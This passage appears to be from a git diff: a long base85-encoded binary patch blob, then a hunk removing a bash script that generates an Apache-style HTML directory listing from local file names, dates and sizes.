z3E=#FWHoT$z_xr%5_I?vV&KfWjEvlr-o8G7-lt`LeNm$6m|VMaT?V?(%IM`uN#O8u zIt!v~!Bo!=1CZxe7Nizuq`IMXNI$ZQY~U0O$2ZpH{h3ShmpA`b##2+0aHUnyv;kzs z3AmDgcJxa0lF021X$dyVNq~HSGzfS&d-a{S-<0ou_jT#$KQ2cP9h1xF&&jX<^M8hO zbFnobx&*LYl=}Kc@u#cx1RfsNPL=s9INPW1%Yr5Wk^noce1Rq)+hX(SF>brfjtvXZnKn@a;P?K0PTfy!4{hqpph~Kcq!dcub4s zrvizB?feq*nNUTdAhbf4u(XiIMCWO6g0x)2dRoII=i-&CFecC~S7E@S2m2ho)c|y8 zpOeO3b;+@D8U2^PElc0}o4uOF1D`LB1zR~Dcgb#tCZ7jIPAtvj*2LmFhS9${iH!|y 
zmaR+x_FMK8Jr#>g1pmR0w3r7Y>oLzt&iV7mYv3^fThm<0o2>zCKbXBLe>w5G^!0U1 zH$=*wEOm|zpqekjW{k$GodeAljkp?vb)63fk=JEqd~QrS8rm@E2SM02{`7UcZY zhccd+mAIP+$MZFKFbwv7j}KgFS1@4fb#oO$YL`RSkf2|Xl!dTLf) z`}TJ58T$3+-@n__3{^qY_Wpzb<{ujO^?|*PfE`NAK+FG0C`RC5c z_rCibaMB6+%qKsAy?oR1NB_@%lnq}{zVMHKPP$uLWG%WZ=iYx${_B7HbNS-WeGvfX zl5c$d8*&l`70y2MG5M1}`C}Xy-z2~Ar7ufody{jbS5pgZVdwnv+~uid>z{aCgn4)z9Pf7Zpsb(>gwv{FTVO! z@nenh=fC_V>Fw^4H(q}YgHe@SyKzHWTHA5({Y`o5>5t3Q*ligby)D(@dg*9uma(Cm z@@Ieg75SMjeo>9J`8dgQNeW{BR0>NcXtR`N4c)w| zlj~3&G>Y|ECpIFzBH6OwkL!=S;tvQYQ0@=LuZEIn;K zvb??|H?f8rt%}LznQM~jHD({tyV#eoK1uElvr#NuxB$|KEOpO}XTNK>xDmKUa(V5(G_Uto~h{xsnwd=@@OMVK*>uLV1sVO4!i?iV7N3fU8 zD_{O6Uy{H3>u<{W58ji3{$4q9?2N3hLUfJ#`OIftl{YV3mRWGnUCm88OFjbgfQOHV zK=%eT1%q2;u2ksN(;hx{WY?H0i?aPQR4BKG)Efc@X=E;bmNu`j}FV1{>d-O z58r-YCMRa4t*HTA_*HrFrI%q1rvm^#33GH&`K2%af?UGnplWeh8k$?>#FSbwd3ZnFNh=G@6bbLa-jO{I13@(Fx1G+~q1kSV$B7SeEMyBWHq`R{n zfL<@}VX|;%WLTD?YY;X2C50-l0$2RxlV`+R-vnzuQR&I_$(a*R%Eb7nq%kOl!U1{a z>{F019G2nhSLG9*cu{WMzJcFOnVp;6Ghpk0?EV?9IekxJU+o=OkgBUk-(6hP=QJc! 
zZjV>GIy>aX_3P;WUP-2sm_&Qgz7yDIyC5UuQ{sbU$>(z;PFw<5GMb#6kw`-mmQmum z^uvk#I>4ImV(6a%7|e)ZKW=Ax+y1Gf1D;b1WsirWDpGfAx4e7hJ?U)igjhEri`iwF z+?bP#t2g9(SZBQ!y{%wN_$0$xg;^(^ij&oYkV~~D%t9e9r3gqJz>@2G(e#=ur=oye z&Q9IZR^KkIo`{_7dP-V-gv*H}H5r`e3dE(+an4NL*n7qU-@7_m z(DD4bK55=pV-tI$ETXf<0lrn3wo-gFH9aL$;7+-=*Z}J@t<4cxfQWPzfSd-xP>f2@ zqJK+kM4BQEGB>v%Lofq3F*PmKn22IQ7iZ)=Q5E!6lM0d}JRd1`w5y=I18he^#W%(0CQ-$A}o zx`sN#&FmO-yhytRN69rcHG_5-v-)~ni>9TWY79smP-^RHv3{G8p*us!{|w&O0Q_UH zI1|^h)6VJwxCSJt>#{d)T$eN8#53uPw6%9={n89v2$BSv!sGXhz(gMFgLThx_yRtN zpA%ZP+S(8}kQVG~Y*uA08c2WCE`y2I=x_dxT>RJz4mbO#KgMp-$2d`27glqGY@=)F zzqQaoxOMX;+V8q7lIsndtuL#viOk6~B|5in-GYUwD8?LUg`gh}kBsUhpW{I+zOH&6 z(~|&XOr|+5+<+v96YVs(WOB}q+Z#1-AURt?B5}}Qp}C`WX|gJ9el93Lxwy(oSj?@@ za&%UQxI|HiYFzx~De=7l+rnQ%TSs=N?6_UnP6Xv9T9a{u#z0NCJbC1#%wfIt`?r25 zGf5~Mxv_of}d%>I(q323@=SrC<0tfI@?O{A16G+v}4-Y>2M` z0Mc;5*{9D+e_xLR#PiQTCyNlhX3;SZA37pS=$Q2Y+@?=`QigiFvDWC3`i2NV+#?O> z+@E~;6MCJ1@$UqHwY#%RPMtc2v})y3FTDusEn)Eh@K2sTgUkVVtE$1R9tGD2?j2ks zImQ+!O@%_R`~u+W>mN`sJoDsPh{2K)fI?Gyf4BI-br0RSBTt+vJuw)3`jt;X z9DG|R3Ef>?au%HO?ChMJdHNYBI(aZa2xjpfiMO>P52#N}COC+M8(RVR0(+@J8SMXc zSzcO{KGcU709+5QIsz{Hxfdwx73m)w(0XZsSo&9g#R(i^Y# zSxBXI8HW>HI}+}kODDvGtN}1@2XE?=0YKbdpOQa(_rJ)S>lbu;j}QB52kW|}rKTBN z<-FWl0T&CXwcM!!UaqDIrr}ILo)4UsfBvywmOg){v5kzt+}cB}w1#naGHNsM{h+A7YLuJ0Gpu;d+;~@u3N6lSoB{LsX9HLm7j-Qs{`7;~p zsgy(-2&+m%P)I^JRbYa@QD{QSC?}P#m<|=NY-eR$tK4K2qIh*7P14^0T>?J0>o6=G zIZfr%kyk2|kt;&5*U;8ur_}E_AKS$@s#qIN8jA@c;7f%W+INKL_WqTvX$~MM+ z==A|0;qXe^nvKP<+Jn9E^VgpHG@3|VcZrR;$Y;37s1Q`8c~@+ z3c)ttv2(QrB62EnR4y)Ehlm==5ZOhUn}SG_8NeXU8=ruKs&11PThGG2a-l<-0X_FQ zkU!OQW*qh^_`eo=xFS4n{uen2#L-|d(iq8^vK~>0gUM3LS+!l ztRsHg&dKsu0d%diY1#J*$N)!T7W1jV3+|qT8HVYq*cI3hmIu6Ht(j3yLO)$`=fxTq^h1a>~KAF7D06 z1O694pW#T~Y@8@J7&2c7!vZ}dM=fK=9lRPa?QG|AZ5NL3iUGWsTBTrK9LKqTur+Wn z!4_j-9k%8Cqr;z&&e;|yLm6cz4zy;VBp1V<+4ojDbSl`2S57t^lQ8J$IF3Nd6#*pp zuhfwSL9x}{AYVB4BhnJ8mrL{4Wdb7Sb%>0@-k@}aTIA{0)ACHqDXF7D3l7?(3-FHNb%!19&JpNScHYRgRS6W&#vBK|6akeYou$(h6K*7^LxW|`y 
zXWs0O6{6fQ65~6H+UH;tg!Fkd7uSb%|1UUmZl~Z0D^u9gLlJWuwgCm9)y9RG(^0|ygqF<28MpNt%n)A;E) zt~FX{j4lk$3Y+j!lYAvLPA-`6sa$0auna)6kr(I`N29`W(B+ptcdIn_y(-VQJ|#2p zB^=e4#&LWBY4KxUr@tB7fvSxX76C+Q0k{C1*REfa4k-Q1V-IN*+i|Gq6oaNMx6@1m zC}_}v;bx#v)Z5#u*|>1wq5@|-w0NhX@RUMcxm~BPw?}T?yeVU2V`?Y&(xpqPKtT&k z!_W|>#iXN0jtR9MFI~7GA71_tTDwmG@F%bxXH8yt*z<0zDkxNmSBCu37nn>EA~Fl~p1@MY|6?I-vGw1UtOZow860%|w*j!OVbnm6PYpDJiZuEIGpY$3h9xbUQyc||612FN zcO0PmxzD~Tqhlkw^@kjI8eHnT@4hQNm>|qAtpJ3V4FCH5;$>kyWF}&FrS4<#R&H2vK}_T#SYyX zlB35@s)pw*wiR)|^U}hK1ZrVC0Ah*+>fqM(8{&u7G{y0>NJWObFqzsVtIMd5sq;8o z{ylwpP96(xivcJPs&-CYnA_-171xZ9FCIu`j>(B=c&IGLF@WAOdY!j-*p5)b)W${5g%)_*4 za*~nKaJQO<@gqaBu*?2?Z;F2+b%~14KUf;GC?1YdeO6rwQ~&j~&sC z?bW_&81JuFprOHjuGJcFK@I^xftsVbMoJ4&NdOo%mkIt}h>83A`jD?~0J{(VX4_6R z{0Uh67pe;ZRNIv!c7sD4a1ZL<*S1c-DJb$m4!#>)Z5-Bayx1??jdF4gmFucJIJy~o zWO;~!ZbL%WXjG#bdu$1|h5;~ZwOohhAk_>B0IysVZU@j3K&kay4=#&!$7gcrq~8Nh znB2Sv_a1Vv_%{Nh0LQ@jHZ;`b>)K?tvcG{-4#3!&awZkLltNhi3^wiD~Uc)>SZu)RxYy^EY6x~?G`YJda- zhXg*NjtVw$ubmZFJ^L}Ify;MPvf?|^(8B=$I=r{e&J@{*^Nz2XZ}T6?sD}a^!J0}( zjAt4@V;PD%i7<=W`cCuBe8Op14XKZt{%9U-`V5bI%@6MRX!C2zp37%Zb~h2rJ(MjM z-WB^7-!mFT?7E*B6NWk)XaMY zHNDNHnNJ$2@IMpFrEJ1-uPQ)i6YcmdnGB>f#aMSaB85k z8rU?HRu;txWoqEw2I-w^Z!=xOg2fT8*V0)(b7gq^a-KG<2HfsXX~50N7GiGl&n05t z=E2o^@M zpWE`?iidsQAw`@=q#C3u^4mIF_?MM2`cJL+$-Ah%LA|5kiM8?H$EOm04 z#oVevSo$&TLX5&4>6N;ox4bR>ZK8u0_FXXv>&L4NZ~ZiasR#ZwKjzv#6%o?-MbG6D zvve!H7L&90nvPAM*PP3zUrO8t*y_q}4wIWd|Fc3d>f`DHCyz_m*<*{(PmskLY!%zZ zJpyhn8ZUVY_MzMr;mW#vWb>Afc7!S$-tl~>HBdDAJk)d#NMabM?O1I~RIYP4eg(#L zuhfP8Uc0{94~|o${`cS7b?k!@q5F6K)j=uBBPxgO2uPkyssOW_ZZ~%v87HrU{mAE}>$iVX z#(wK}?wQ7ZjM)2ce^)}!Kbu!V+mB_qzj-zWV0VHydsv78MD8#LucP`3RM-O-sszkE z2Nz?t&E(YTCQuQQ3V#gBkweX(=7ta|{Tay@t*w#UHuUdrSsiNkS_2N)?y~0C$f

    ../
    -	EOF
    -
    -	# start of content output
    -	(
    -	# change IFS locally within subshell so the for loop saves line correctly to L var
    -	IFS=$'\n';
    -
    -	# pretty sweet, will mimick the normal apache output. skipping "index" and hidden files
    -	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,\1,g');
    -	do
    -		# file
    -		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
    -
    -		# file with file size
    -		F=$(du -bh $F | cut -f1);
    -
    -		# output with correct format
    -		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
    -	done;
    -	) >> $index_file;
    -
    -	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
    -	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/\1,g' >> $index_file
    -
    -	# print the footer html
    -	echo "